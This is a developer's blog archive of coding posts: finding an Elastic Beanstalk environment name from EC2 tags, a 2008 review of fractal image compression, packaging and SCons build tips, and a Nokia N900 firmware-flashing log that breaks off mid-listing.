Category Archives: code

How to find the name of an Elastic Beanstalk environment from inside one of its instances

At Thumbtack, we’ve started using Amazon Elastic Beanstalk (EB) to deploy web services. We already use Papertrail as a log aggregator for our existing systems, and have installed their syslog forwarding agent on our EB apps using .ebextensions. However, I didn’t have a way to group log output from multiple EB-managed EC2 instances, or distinguish EB environments by name, because the default EC2 hostnames are just IP addresses with an “ip-” prefix. So I decided to use the EB environment name, which is unique across all EC2 regions, and tell Papertrail’s agent to use that instead of a hostname.

EB sets the environment ID and name as the elasticbeanstalk:environment-id and elasticbeanstalk:environment-name EC2 tags on all of the parts of an EB app environment: load balancer, EC2 instances, security groups, etc. Surprisingly, EC2 tags aren’t available to instances through the instance metadata interface, but they are available through the normal AWS API’s DescribeTags call. EB app container instances are based on Amazon Linux and have Python 2.6 and Boto preinstalled, so rather than go through the shell gyrations suggested by StackOverflow, I wrote a Python script (get-eb-env-name.py) that uses Boto to fetch the instance ID and region, then uses those two together with the instance’s IAM role to fetch its own tags, and prints the environment name.
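The flow of that script can be sketched roughly as follows. This is an illustrative reconstruction, not the gist itself: the boto calls are from the boto 2 API that Amazon Linux preinstalls, and the helper names are my own.

```python
import json

IDENTITY_URL = "http://169.254.169.254/latest/dynamic/instance-identity/document"
NAME_TAG = "elasticbeanstalk:environment-name"

def parse_identity(raw):
    # The instance identity document carries both pieces that DescribeTags
    # needs: the instance's own ID and its region.
    doc = json.loads(raw)
    return doc["instanceId"], doc["region"]

def pick_env_name(tags):
    # `tags` is a {key: value} dict built from the DescribeTags response.
    return tags.get(NAME_TAG)

def main():
    # Imports kept here because these are only available on the instance.
    import urllib2           # the script targets the preinstalled Python 2.6
    import boto.ec2          # preinstalled on Amazon Linux
    instance_id, region = parse_identity(urllib2.urlopen(IDENTITY_URL).read())
    conn = boto.ec2.connect_to_region(region)   # credentials via the IAM role
    tags = dict((t.name, t.value)
                for t in conn.get_all_tags(filters={"resource-id": instance_id}))
    print(pick_env_name(tags))

if __name__ == "__main__":
    main()
```

The `get_all_tags` filter restricts the DescribeTags call to the instance’s own resource ID, so the script never sees tags for other resources.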

You’ll need to make sure the IAM role used by your EB app environment has permission to describe tags, and possibly to describe instances and instance reservations as well. I’ve included an IAM policy file (EC2-Describe-IAM-policy.json) that you can apply to your IAM role to grant it permission to describe any EC2 resource.

See my gist:

[gist 08880dc2c74b9c26cb5b /]

There’s an annoying wrinkle around getting the region for an EC2 instance through the instance metadata: you can’t, at least not through a directly documented method. You can get the availability zone (AZ) from http://169.254.169.254/latest/meta-data/placement/availability-zone, which will be something like us-west-2a, and then drop the last letter, giving you a region name like us-west-2. However, Amazon has never documented the relationship between AZ names and region names, so it’s possible this could break in the future.
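If you do rely on that convention anyway, the conversion is a one-liner (assuming, as has held so far, that an AZ name is the region name plus a single trailing letter):

```python
def region_from_az(az):
    # "us-west-2a" -> "us-west-2"; leans on the undocumented convention
    # that an availability zone name is its region name plus one letter.
    return az[:-1]
```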

You can also fetch an instance identity document in JSON format from http://169.254.169.254/latest/dynamic/instance-identity/document. Its contents aren’t documented either, but on all the EC2 instances I’ve examined, it looks like this, and contains the region as well as the AZ:

{
  "instanceId" : "i-12abcdef",
  "billingProducts" : null,
  "architecture" : "x86_64",
  "imageId" : "ami-dc123456",
  "pendingTime" : "2014-12-18T01:20:42Z",
  "instanceType" : "m3.2xlarge",
  "accountId" : "1234567890",
  "kernelId" : null,
  "ramdiskId" : null,
  "region" : "us-west-2",
  "version" : "2010-08-31",
  "privateIp" : "172.16.1.1",
  "availabilityZone" : "us-west-2a",
  "devpayProductCodes" : null
}

Since the instance identity document actually has a key named region, I decided to go with that method to find the region for an EC2 instance from inside that instance.

Previously, we’d set an environment variable or customize a config file to tell Papertrail what “hostname” to use. Finding the EB environment name at runtime from EC2 tags means that we don’t have to customize EB app bundles for each target environment, and thus can use the same app bundle across multiple environments; for example, from a CI build server’s test environment to a staging environment, and then to production.


A Review of Fractal Image Compression and Related Algorithms

I wrote this review paper on fractal image compression, denoising, and enlargement back in 2008 while I was at Caltech, and thought I’d lost it until discovering a copy in my backups. Fractal compression is a fascinating area, and I went on to prototype a GPGPU-accelerated image enlarger as my capstone graphics project. It actually predates OpenCL, and I hope to come back to it someday for an overhaul, using this paper for reference.

A Review of Fractal Image Compression and Related Algorithms

Jeremy Ehrhardt – 2008-03-18

Introduction

Fractal image compression is a curious diversion from the main road of raster image compression techniques. Fractal compressors do not store pixel values. Rather, they store a fractal, the attractor of which is the image that was encoded. This representation of an image has a number of useful properties.

The property that drove initial development of the field is that images with fractal properties can potentially be encoded in very few bits if a close match for their generating fractal can be found. Fractal-like images are frequently found in nature, so fractal compression promised very high compression ratios for natural scenes such as clouds, landscapes, forests, etc. Another useful property is the scale independence of fractals. Fractal-encoded images may be decoded at larger or smaller sizes than the original without major distortion.

This review covers major developments unique to fractal image compression. Many published algorithms incorporate general data compression techniques such as vector quantization and entropy coding (as many non-fractal compressors do), but the details are best covered by general data compression literature, and have thus been omitted. There is also some recent work hybridizing fractal and wavelet compression, which is best left to a review of wavelet-based methods, and has also been omitted.

The first problem in the field was showing that a fractal representation could be found for any image. The Collage Theorem established that it could, and was followed by an algorithm that generates fractal representations for arbitrary images. That algorithm was slow, so subsequent work concentrated on speeding up the search for fractal representations and on improving their quality. The partitioning of the image to be encoded was a common target for improvement, and several of the important schemes are discussed below.

Unfortunately, fractal compression was found to have some problems. Early research did not establish that natural images were actually self-similar to such a degree that fractal compression was the best fit. Additionally, optimal encoding was found to be NP-hard. These difficulties are the reason that fractal codecs are virtually nonexistent in the current graphics universe, having been superseded by other codecs with more general applications and higher speeds.

However, the useful properties of fractal encodings have found some use outside of the performance-sensitive area of compression. Two fractal image-processing algorithms are discussed in the last section; one for image enlargement, and one for noise removal. First, we will discuss the development of fractal image compression, from the initial mathematical development of the field in the late 1980s and the first implementation in the early 1990s, up through the various improvements over the following decades.

The Collage Theorem

Barnsley’s 1985 Collage Theorem [BARNSLEY, p. 89] made fractal image compression possible. It states that, given an iterated function system (IFS, a list of repeatedly applied contractive transforms) and some subset of a complete metric space, the attractor of the IFS is “close” to the given subset whenever the union of the images of the subset under the member transforms of the IFS is “close” to the original subset (for a certain definition of “close”). The Collage Theorem thus establishes a guideline for finding fractal approximations to images: work out transforms that take parts of an image to itself. The attractor of those transforms will then be close to the original image.
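In symbols: let h be the Hausdorff metric, {w₁, …, w_N} an IFS with contractivity factor s < 1, A its attractor, and L the target set. The theorem’s standard form (paraphrasing Barnsley’s statement) is:

```latex
% Collage Theorem: a small "collage error" bounds the distance to the attractor.
h\!\left(L,\ \bigcup_{i=1}^{N} w_i(L)\right) \le \varepsilon
\quad \Longrightarrow \quad
h(L, A) \le \frac{\varepsilon}{1 - s}
```

So if the collage of L under the transforms nearly covers L, the attractor is guaranteed to be correspondingly close to L.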

Barnsley presents a number of examples of simple fractals for which the reader is encouraged to figure out suitable IFS representations by hand. Barnsley does not, however, elaborate on how to find such an IFS representation for an arbitrary image.

Beginnings of fractal image compression

The first algorithm capable of generating an IFS fractal representation for an arbitrary raster image was proposed by Barnsley’s graduate student Jacquin [JACQUIN1]. Jacquin’s fractal coding scheme is based on non-overlapping square block partitions of the image being encoded. It defines a “distortion” measure based on the L2 distance between the pixels of two image blocks, as well as a number of contractive linear transformations that act on image blocks. The transformations used include geometric transforms from isometries of the square blocks, as well as pixel value transforms that change the overall luminance of the block being transformed.

Figure 1: Transformations used by Jacquin’s original algorithm [JACQUIN1, Table 1].

Jacquin’s algorithm divides the image to be encoded into “domain” blocks of a given size, and classifies the blocks based on their appearance: shade, midrange, simple edge, or mixed edge. Classifying the blocks in this way reduces the pool of blocks that must be searched in the next step. The algorithm then divides the image into “range” blocks containing a quarter as many pixels, and iterates through them. For each range block, it searches the domain blocks in the same class, looking for a transformation or transformations that map a domain block to the range block with minimum distortion. (Domain blocks are downsampled to the same number of pixels as range blocks for the distortion calculation.)

Figure 2: The fractal encoding process [JACQUIN2, Fig. 2]. Rᵢ is a range block, D is the domain block pool, and T is the transform pool.

This process produces a list of self-similarity-producing transforms, from regions of the image to other regions of the image, that constitute an IFS with the original image as the fractal’s attractor. If no transformation can be found for some range block with a measured distortion below a given threshold, the range block is partitioned into 4 equally sized square children, and the search is repeated with the children as range blocks.
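The core of the search can be sketched in a few lines (blocks as flat lists of pixel values, the transform pool as plain functions; the names here are illustrative, not Jacquin’s):

```python
def distortion(a, b):
    # L2 distance between two equal-length pixel lists.
    return sum((x - y) ** 2 for x, y in zip(a, b)) ** 0.5

def best_match(range_block, domain_blocks, transforms):
    # Exhaustive search over the (pre-classified, pre-downsampled) domain
    # pool and the transform pool: keep whichever pair maps onto the
    # range block with minimum distortion.
    best = None
    for d, domain in enumerate(domain_blocks):
        for t, transform in enumerate(transforms):
            err = distortion(transform(domain), range_block)
            if best is None or err < best[0]:
                best = (err, d, t)
    return best  # (distortion, domain index, transform index)
```

The encoder stores only one (domain index, transform index) pair per range block, which is where the compression comes from.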

Reconstructing an image from its IFS representation is a much simpler procedure than the above encoding algorithm. The list of transforms is applied some number of times to an arbitrary image. With each iteration, since the original image is the fixed point of the IFS, the starting image is transformed to more closely resemble the original encoded image. The image may be reconstructed at a higher or lower quality by increasing or decreasing the number of iterations.
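Decoding is just iteration; a sketch, with the whole per-pass application of the transform list bundled into a single function (illustrative, not any particular paper’s code):

```python
def decode(apply_ifs, start, iterations=10):
    # `apply_ifs` performs one full pass: every range block is overwritten
    # from its stored (transformed) domain block. Because each pass is
    # contractive, iterating from *any* starting image converges toward
    # the attractor -- an approximation of the encoded image.
    image = start
    for _ in range(iterations):
        image = apply_ifs(image)
    return image
```

Even a toy contraction shows the fixed-point behavior: iterating img → [p / 2 + 50 for p in img] from any starting pixel values converges to an all-100 image.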

Figure 3: Reconstruction of a fractally encoded image: starting image (a), 1 iteration (b), 2 iterations (c), and 10 iterations (d). [FISHER, Fig. 1.10]

Jacquin [JACQUIN1] demonstrated encoding and decoding on the standard Lena test image. The paper does not include coding speed or memory usage statistics for the test image, so it is impossible to discern whether its fractal coding scheme was competitive with other image compression schemes of the time. Jacquin published a clarified and expanded version of this encoding procedure two years later [JACQUIN2]. Almost all fractal image compression algorithms are extended versions of this algorithm.

Improvements in partitioning

The simple two-level image partitioning scheme used by Jacquin has been a target for replacement in later work. The motivation for changing the partitioning scheme is to reduce the error in the mapping between range and domain blocks, and thus improve the fidelity of the image encoding. Fisher describes two partitioning schemes that improve on Jacquin’s.

Figure 4: Fixed partitioning [WOHLBERG1, Fig. 2a].

Figure 5: Quadtree partitioning [WOHLBERG1, Fig. 2b].

Figure 6: HV partitioning [WOHLBERG1, Fig. 2c].

Figure 7: Delaunay partitioning [WOHLBERG1, Fig. 3c].

Fisher describes quadtree partitioning [FISHER, Ch. 3] as “a ‘typical’ fractal scheme and a good first step for those wishing to implement their own.” A quadtree is a data structure that subdivides 2D space: each node represents a square area, and nodes may be subdivided into four equally sized square child nodes. Quadtree partitioning is an “adaptive” scheme that produces different partitions for different images, based on their content. Fisher’s quadtree algorithm first subdivides the image to be encoded several times, producing a balanced quadtree several layers deep. The leaf nodes of this initial quadtree are range blocks as in Jacquin [JACQUIN2]. Domain blocks are chosen from nodes that are one level closer to the root than the range blocks, and thus four times the area. All domain blocks are compared with each range block, and if no transformation can be found that maps a domain block to the range block under consideration with less than some threshold level of distortion, the range block is subdivided. It may be recursively subdivided several times until a low-distortion mapping from a domain block is found, or a maximum tree depth is reached.

Jacquin’s original partitioning scheme is almost a special case of quadtree partitioning with a minimum depth of n and maximum depth of n+1, where n is however many partitions it takes to subdivide the image into blocks of the desired range block size, and the levels of the tree closer to the root are not actually represented in the scheme’s data structures.
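The recursive subdivision at the heart of the quadtree scheme can be sketched like this, with find_match standing in for the whole domain-pool search (it is assumed to return a mapping, or None when nothing beats the distortion threshold):

```python
def encode_quadtree(x, y, size, depth, find_match, max_depth):
    # Try to cover the square range block at (x, y); if no domain block
    # maps onto it acceptably, split into four quadrants and recurse.
    match = find_match(x, y, size)
    if match is not None or depth == max_depth:
        return [(x, y, size, match)]
    half = size // 2
    leaves = []
    for dx in (0, half):
        for dy in (0, half):
            leaves += encode_quadtree(x + dx, y + dy, half, depth + 1,
                                      find_match, max_depth)
    return leaves  # one (x, y, size, match) record per range block
```

Smooth areas match early and stay as large blocks; detailed areas recurse down to small ones, which is exactly the adaptivity described above.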

HV partitioning [FISHER, Ch. 6] is similar to quadtree partitioning in that it involves recursive partitioning of rectangular areas. When a quadtree range block is split, it is always divided into four equal areas. HV partitioning has an additional adaptive element: when an HV-tree range block is split, the orientation (horizontal or vertical) and position of the dividing line are chosen to maximize the difference between average pixel values on either side of the line, with a bias applied to prefer splits that do not create very thin sub-rectangles. The goal of HV partitioning is to create a partition that better corresponds to the structure of the image than a quadtree partition does, and thus use fewer ranges when encoding the image, improving encoding time and quality.
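A sketch of that split selection (blocks as lists of rows; the bias term here is one simple choice, and Fisher’s exact weighting differs):

```python
def hv_split(block):
    # Choose ("h", i): cut above row i, or ("v", j): cut left of column j,
    # maximizing the difference of mean pixel values across the cut,
    # weighted to discourage very thin sub-rectangles.
    def mean(rows):
        flat = [p for row in rows for p in row]
        return sum(flat) / float(len(flat))
    h, w = len(block), len(block[0])
    best = None
    for i in range(1, h):                       # horizontal cuts
        bias = min(i, h - i) / float(h)
        score = abs(mean(block[:i]) - mean(block[i:])) * bias
        if best is None or score > best[0]:
            best = (score, ("h", i))
    for j in range(1, w):                       # vertical cuts
        left = [row[:j] for row in block]
        right = [row[j:] for row in block]
        bias = min(j, w - j) / float(w)
        score = abs(mean(left) - mean(right)) * bias
        if best is None or score > best[0]:
            best = (score, ("v", j))
    return best[1]
```

On a block with a sharp brightness edge, the chosen cut lands on the edge, so the partition follows the image structure rather than a fixed grid.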

A drawback of HV partitioning is the greater variety of possible transformations between range and domain blocks, since both are rectangles of essentially arbitrary dimensions, rather than squares with power-of-two dimensions. This increases both search times and the number of bits required to represent a mapping, although the generally lower number of mappings required offsets the latter.

Fisher notes a weakness in both quadtree and HV partitioning: reconstructed images suffer from visible blockiness at all but the highest reconstruction qualities. Fisher’s quadtree partitioning [FISHER, Ch. 3] deals with this by applying a heuristic deblocking filter during image reconstruction. The filter averages pixels on either side of a range block boundary, with pixels on the inside weighted by a factor proportional to the range block’s depth in the quadtree. Fisher describes a similar procedure for blocks in an HV tree [FISHER, Ch. 6]. Blocky artifacts are by no means unique to these two schemes or fractal image compression in general; DCT-based codecs such as JPEG and the MPEG family are also susceptible to blockiness. The JPEG standard does not include a deblocking filter, but some MPEG variants do, such as H.264.

One scheme [DAVOINE] not based on rectangular blocks uses a mesh partition made up of triangles, which is generated by repeated adaptive Delaunay triangulation and triangle splitting. The goal of this scheme is to cover the image in triangles that are as large as possible while maintaining a variance in internal pixel brightness values that is less than some threshold parameter (triangles meeting this condition are “homogeneous”). Thus, regions with internal brightness boundaries are split up. Delaunay triangulation was chosen to minimize the number of thin triangles, and thus reduce numerical problems when the internal pixels of a triangle are read from the image raster.

Initially, the image is covered with a regular grid of vertices. In the splitting phase, the Delaunay triangulation of the vertices is calculated; then, for every triangle that is not homogeneous, a new vertex is added at the barycenter of that triangle. Splitting is repeated until convergence, or until some iteration limit is reached. In the merge phase, the algorithm removes vertices for which all surrounding triangles have similar pixel value mean and variance. Then a final triangulation is performed. This procedure is used to generate both domain and range sets of triangles, with domain triangles permitted a greater variance.

Adaptive triangular partitions generally use fewer blocks than quadtree or HV partitions. An additional advantage of triangular blocks is that inter-block seams do not always line up with pixel boundaries, so there is less visible blockiness in the decoded image. The major disadvantage is that both encoding and decoding require transformations between arbitrarily shaped triangular range and domain blocks; this involves substantially more interpolation than the rectangle-based schemes.

Difficulties of fractal image compression

Since the idea behind fractal image compression is that the image being compressed can be modeled as a fractal, useful fractal image compression requires that the image actually have fractal characteristics so that it can be efficiently modeled that way. Clarke & Linnett [CLARKE] pointed out that while fractal image compression is frequently proposed as a compression scheme for images of nature (such as plants, landscapes, clouds), it is not necessarily the case that those images have the affine self-similarities required for effective compression by existing fractal compression schemes, or indeed, that they have any fractal characteristics at all.

Figure 8: Fractal fern [FERN1].

Figure 9: Real fern [FERN2].

As an example, they observed that there are significant differences between a simple computer-generated fractal fern and a photo of a real fern. A fractal fern is highly idealized and may be represented very efficiently by a fractal model, but a natural fern does not have its perfect regularity, and the self-similarity breaks down at some scales. In particular, the fern leaves resemble the whole fern, but are different structures nonetheless, and can only be approximated by small copies of the whole fern.

Wohlberg & de Jager [WOHLBERG2] examined statistical properties of natural images with regard to fractal image encoding, specifically with regard to the deterministic self-similar fractal representations used by all of the above algorithms. Their conclusions seem to confirm the assertion of Clarke & Linnett: “The form of self-affinity considered here therefore does not appear to represent a more accurate characterization of image statistics than vastly simpler models such as multiresolution autoregressive models.”

It has been proved [MATTHIAS] that finding an optimal fractal encoding for an arbitrary image is NP-hard. Furthermore, it has been proved that algorithms derived from Jacquin’s original Collage Theorem-based algorithm do not generate approximations to optimal encodings. So, at least with currently known encoding methods, there is an unavoidable tradeoff between fast (polynomial-time) encoding and obtaining the highest quality representation that will fit in a given amount of space. This is a huge disadvantage relative to other image compression methods: for example, JPEG’s DCT block coding processes one fixed-size block of pixels at a time, which results in an encoding time that is a linear function of the number of samples in the original image.

Fractal image processing

Authors focused on image compression have treated the iterative reconstruction process for fractal image encodings as a way to control the quality of a reconstructed image. Polidori & Dugelay [POLIDORI] examined the reconstruction process as a procedure for image enlargement.

The most commonly used algorithms for this purpose are variations on polynomial interpolation of samples (the pixels of the original image). The assumption underlying polynomial interpolation is that the samples are from a smooth continuous function. Polidori & Dugelay made a different assumption: that the function that the image was sampled from is fractal in nature, instead of smooth. Then a fractal encoding of that image would be an approximation of that fractal. Since fractals are scale-independent, the image could then be reconstructed at any size from the encoding.

Polidori & Dugelay first examined fractal image encoding and decoding schemes identical to those developed for image compression, based on nonoverlapping partitions of the image. They found that such schemes tended to produce blocky reconstructed images with undesirable artifacts when used to reconstruct images at a larger size than the original image. They then examined the idea of using overlapped domain blocks, which retain redundant information not desirable for compression applications, but useful for image enlargement. They proposed and tested several methods of recombining the overlapped blocks, with some methods yielding enlargements with visual quality comparable to those obtained through classical interpolation.

Another image processing technique that makes use of the scale independence of fractal image encoding is fractal denoising. Additive white Gaussian noise (AWGN) is common in images acquired from noisy sensors or transmitted through noisy communications channels. Images containing this kind of noise can be modeled as a series of samples where each sample is the sum of the value from the noise-free original and a value taken from a Gaussian distribution. Obviously, this model is scale-dependent, and one might expect that fractal image encoding poorly represents AWGN.

In fact, this is the case. Ghazel, Freeman & Vrscay [GHAZEL] noticed that “straightforward fractal-based coding performs rather well as a denoiser”. This motivated the development of their denoising algorithm, which goes a step further: it statistically estimates a fractal encoding of the noise-free image from a fractal encoding of an AWGN-contaminated noisy image.

In the first step of the algorithm, the noisy image is examined for areas with nearly uniform pixel values. The difference in value from pixel to pixel in such regions is likely due to noise, so the variance of the AWGN can be estimated from the variance of these regions. The image is then encoded as a series of transformations from domain blocks to range blocks in the usual fashion. (Adaptive quadtree partitioning is used, as it results in the best quality of reconstructed images.) Each transformation in the encoding that affects pixel values (“gray-level” transforms, as opposed to “geometric” transforms) is adjusted using the previously estimated variance according to a simple relation. Finally, the image is reconstructed from the modified fractal encoding.
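The variance-estimation step can be sketched as plain bookkeeping (finding the flat regions and the gray-level transform adjustment itself are specific to [GHAZEL] and not guessed at here):

```python
def estimate_noise_variance(flat_regions):
    # In nearly uniform regions, pixel-to-pixel variation is assumed to be
    # noise, so the AWGN variance is estimated by pooling the sample
    # variance of each flat region (each given as a list of pixel values).
    variances = []
    for region in flat_regions:
        m = sum(region) / float(len(region))
        variances.append(sum((p - m) ** 2 for p in region) / float(len(region)))
    return sum(variances) / float(len(variances))
```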

Figure 10: Comparison of fractal denoising and Lee filtering [GHAZEL].

Ghazel, Freeman & Vrscay report that fractal denoising is competitive with or superior to Lee filtering, which is a common locally adaptive linear denoising algorithm. Furthermore, fractal denoising is more likely to outperform Lee filtering as the variance of the AWGN increases, making the fractal method an attractive choice for processing very noisy images.

Conclusion

A review of fractal image compression cannot fail to state this: despite years of improvements, such as the previously discussed partitioning schemes, fractal image compression is not competitive with current block-DCT or wavelet methods. The speed and quality issues noted above have prevented broad use of fractals for storage of compressed images.

However, fractal image processing techniques have found some application: fractal image enlargement was eventually commercialized as a product known as Genuine Fractals [GENUINEFRACTALS] which is well known within the desktop publishing industry as a high-quality image scaler suitable for making large prints from digital photos.

References

BARNSLEY

Barnsley, M. F. (1988). Fractals Everywhere, Academic Press Inc., US.

JACQUIN1

Jacquin, A. E. (1990). A novel fractal block-coding technique for digital images. Proceedings of ICASSP-90, IEEE International Conference on Acoustics, Speech, and Signal Processing.

JACQUIN2

Jacquin, A. E. (1992). “Image coding based on a fractal theory of iterated contractive image transformations.” IEEE Transactions on Image Processing 1(1): 18-30.

JACQUIN3

Jacquin, A. E. (1993). “Fractal image coding: a review.” Proceedings of the IEEE 81(10): 1451-1465.

CLARKE

Clarke, R. J. and L. M. Linnett (1993). “Fractals and image representation.” Electronics & Communication Engineering Journal 5(4): 233-239.

DIETMAR

Saupe, D. and R. Hamzaoui (1994). “A review of the fractal image compression literature.” SIGGRAPH Comput. Graph. 28(4): 268-276.

FISHER

Fisher, Y. (1995). Fractal image compression: theory and application, Springer-Verlag London, UK.

POLIDORI

Polidori, E. and J. L. Dugelay (1995). Zooming using IFS. NATO ASI Conf. Fractal Image Encoding and Analysis, Trondheim.

DAVOINE

Davoine, F., M. Antonini, et al. (1996). “Fractal image compression based on Delaunay triangulation and vector quantization.” IEEE Transactions on Image Processing 5(2): 338-346.

MATTHIAS

Ruhl, M. and H. Hartenstein (1997). Optimal Fractal Coding is NP-Hard. Proceedings of the Conference on Data Compression, IEEE Computer Society.

WOHLBERG1

Wohlberg, B. and G. de Jager (1999). “A review of the fractal image coding literature.” IEEE Transactions on Image Processing 8(12): 1716-1729.

WOHLBERG2

Wohlberg, B. and G. de Jager (1999). “A class of multiresolution stochastic models generating self-affine images.” IEEE Transactions on Signal Processing 47(6): 1739-1742.

GHAZEL

Ghazel, M., G. H. Freeman, et al. (2003). “Fractal image denoising.” IEEE Transactions on Image Processing 12(12): 1560-1578.

GENUINEFRACTALS

onOne Software, Inc. “Genuine Fractals 5.” Retrieved 2008-03-17, from http://www.ononesoftware.com/products/genuine_fractals.php.

FERN1

Mihályi, A. “Fractal fern.” Retrieved 2008-03-17, from http://en.wikipedia.org/wiki/Image:Fractal_fern1.png.

FERN2

“Olegivvit”. “Leaf of fern.” Retrieved 2008-03-17, from http://en.wikipedia.org/wiki/Image:Fern-leaf-oliv.jpg.


Package your own mod_auth_openid 0.9 for Ubuntu

First, you’ll need the Debian New Maintainers’ Guide… just kidding. It’s totally useless. Don’t bother with it unless you really care about copyright metadata.

We’ll be using Jordan Sissel’s FPM (“Effing package management!”) utility to turn a packaging directory into an actual .deb package. The packaging directory has the same structure as /: an /etc, a /usr, a /usr/lib, and so forth, and we’ll put build products from mod_auth_openid’s Autotools project into it.

I’ve put the instructions into a gist, which should work on Ubuntu 13.04/13.10 (Raring Ringtail/Saucy Salamander) and probably later releases.

One minor wrinkle: APXS doesn’t respect the DESTDIR environment variable, so we can’t just run make install into the packaging directory; instead, we’ll have to assemble the contents of the packaging directory by hand.

See my GDC 2014 slides!

I recently had the privilege of presenting a talk at GDC 2014 for KIXEYE: Building Customer Support and Loyalty, in which I talked about how and why KIXEYE built the Monocle customer support system as a web app, the challenges and rewards of building a uniform support API across multiple games, and how designing games with support scenarios in mind yields benefits across the whole product. Pretty exciting to get to show off my whole team’s work. The full talk will be in the GDC Vault later this month, but for now, I’ve uploaded slides:

Modifying SCons environment variables, globally

SCons, the Python-based build system, tries to isolate itself from the user’s environment as much as possible, so that one developer’s weird environment variables don’t lead to an irreproducible build. This is great until you want to use tools from places that SCons doesn’t think are standard, in which case you can make use of its site_scons extension mechanism to make them standard.

In this case, I’m using Homebrew. Homebrew normally installs into /usr/local. I think this default is completely mental, because /usr/local is the Balkans of Mac software packaging: routinely invaded and full of land mines. I’ve installed Homebrew into /opt/homebrew, where it’s safe from having parts overwritten at random by unmanaged package installers. For Make builds, I’ve included these lines at the end of my .zshrc to make Homebrew components available:

export PATH="/opt/homebrew/bin:$PATH"
export CFLAGS='-I/opt/homebrew/include'
export LDFLAGS='-L/opt/homebrew/lib'

For SCons, I’ve created the file $HOME/.scons/site_scons/site_init.py to modify the Environment object used by SCons subprocesses:
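The gist isn’t reproduced here, but the shape of it looks roughly like this. A sketch: the SCons internals being patched (SCons.Environment.Base.__init__, PrependENVPath, Append) are real API, but version-specific details may differ, and the pure helper exists only to make the path logic testable.

```python
# $HOME/.scons/site_scons/site_init.py
import os

BREW = "/opt/homebrew"

def prepend_path(env_vars, directory):
    # Pure helper: prepend a directory to a PATH-style value in a dict.
    old = env_vars.get("PATH", "")
    env_vars["PATH"] = directory + ((os.pathsep + old) if old else "")
    return env_vars

try:
    import SCons.Environment

    _original_init = SCons.Environment.Base.__init__

    def _homebrew_init(self, *args, **kwargs):
        # Decorate the Environment initializer so every environment any
        # SConstruct creates can see Homebrew's tools and libraries.
        _original_init(self, *args, **kwargs)
        self.PrependENVPath("PATH", BREW + "/bin")      # sdl-config et al.
        self.Append(CFLAGS=["-I" + BREW + "/include"],
                    CXXFLAGS=["-I" + BREW + "/include"],
                    LINKFLAGS=["-L" + BREW + "/lib"])

    SCons.Environment.Base.__init__ = _homebrew_init
except ImportError:
    pass  # not running under SCons
```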

Specifically, my site_init.py decorates the Environment initializer to always add Homebrew to the PATH, and now I have binaries like sdl-config available. (SCons has support for parsing the flags emitted by those config programs.) This should extend to CFLAGS and LDFLAGS, except that they’re most likely strings instead of lists. I’ve since refined the gist to add CFLAGS, CXXFLAGS, and LDFLAGS to the SCons environment.

The end result is that I can assume that any SCons build on my system will have access to libraries and tools installed through Homebrew.


connecting a Raspberry Pi to a Nokia N900 using USB networking

I’ve got a Nokia N900 going spare since I upgraded to a phone for which people actually write apps. Lots of possibilities with the N900. It’s got a shedload of radios, a decent CPU, an IR blaster, and not one but two cameras. The one thing it doesn’t have is any way to plug in more things.

Enter the Raspberry Pi I got at PyCon last week. It comes with lots of GPIO pins, and a USB port where one might plausibly plug in an N900. Clearly, these two devices were meant to be friends. Let’s get them talking.

Prepping the N900

The N900 runs Maemo, a heavily customized Debian fork, which was a fine OS for a hackable device. However, I used mine as an actual phone for several years, and it’s gotten kinda janky, so I’m going to blast it back to factory-fresh and then bring it up to the latest community-developed version of Maemo.

Reset N900 to factory state

Maemo wiki: updating the firmware

Using flasher 3.5 on Win7 x64, installed to C:\Program Files (x86)\maemo\flasher-3.5.
Install libusb 1.2.2.0 from SourceForge. Copy amd64 version of libusb0.dll to flasher install dir.

Shut down N900. While holding down U key on N900 keyboard, plug USB cable into PC.

Run libusb bin\inf-wizard.exe. Select “Nokia N900 (Update mode)” from device list. Create a .inf, save it, and install the .inf using the “Install Now” button. Click past the unsigned driver warnings.

Open a console as an administrator. cd to flasher install dir. Run flasher-3.5.exe --read-device-id to see if the flasher app works. Result:

flasher v2.5.2 (Sep 24 2009)

USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002

Flash eMMC image

This is the user filesystem. I got the latest version from http://skeiron.org/tablets-dev/nokia_N900/.

C:\Program Files (x86)\maemo\flasher-3.5>flasher-3.5.exe -F C:\Users\jeremye\Downloads\RX-51_2009SE_10.2010.13-2.VANILLA_PR_EMMC_MR0_ARM.bin -f
flasher v2.5.2 (Sep 24 2009)

Image 'mmc', size 255947 kB
        Version RX-51_2009SE_10.2010.13-2.VANILLA
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x0105.
Found device RX-51, hardware revision 2101
NOLO version 1.4.14
Version of 'sw-release': RX-51_2009SE_21.2011.38-1.002_PR_002
Booting device into flash mode.
Suitable USB device not found, waiting.
USB device found found at bus bus-0, device address \\.\libusb0-0001--0x0421-0x01c8.
Raw data transfer EP found at EP2.
[init        20 %   32768 /  255947 kB     0 kB/s]

Unplug N900’s USB cable. Remove battery. Wait until N900 shuts down. Replace battery. While holding down U, reconnect USB cable.

Flash rootfs image

This is where Linux lives. I used Maemo 5 PR 1.3.1, which is the very last official version, postdates the skeiron.org mirror, and can be found on Nokia’s files site by Googling parts of the filename: RX-51_2009SE_21.2011.38-1_PR_COMBINED_MR0_ARM.bin

C:\Program Files (x86)\maemo\flasher-3.5>flasher-3.5.exe -F "C:\Users\jeremye\Downloads\RX-51_2009SE_21.2011.38-1_PR_COMBINED_MR0_ARM.bin" -f -R
flasher v2.5.2 (Sep 24 2009)

SW version in image: RX-51_2009SE_21.2011.38-1_PR_MR0
Image 'kernel', size 1705 kB
        Version 2.6.28-20103103+0m5
Image 'rootfs', size 185728 kB
        Version RX-51_2009SE_21.2011.38-1_PR_MR0
Image 'cmt-2nd', size 81408 bytes
        Version BB5_09.36
Image 'cmt-algo', size 519808 bytes
        Version BB5_09.36
Image 'cmt-mcusw', size 5826 kB
        Version rx51_ICPR82_10w08
Image '2nd', size 14720 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image 'secondary', size 109440 bytes
        Valid for RX-51: 2217, 2218, 2219, 2220, 2120
        Version 1.4.14.9+0m5
Image '2nd', size 14720 bytes
        Valid for RX-51: 2101, 2102, 2103
        Version 1.4.14.9+0m5
Image 'xloader', size 14848 bytes
        Valid for RX-51: 2101, 2102, 2103
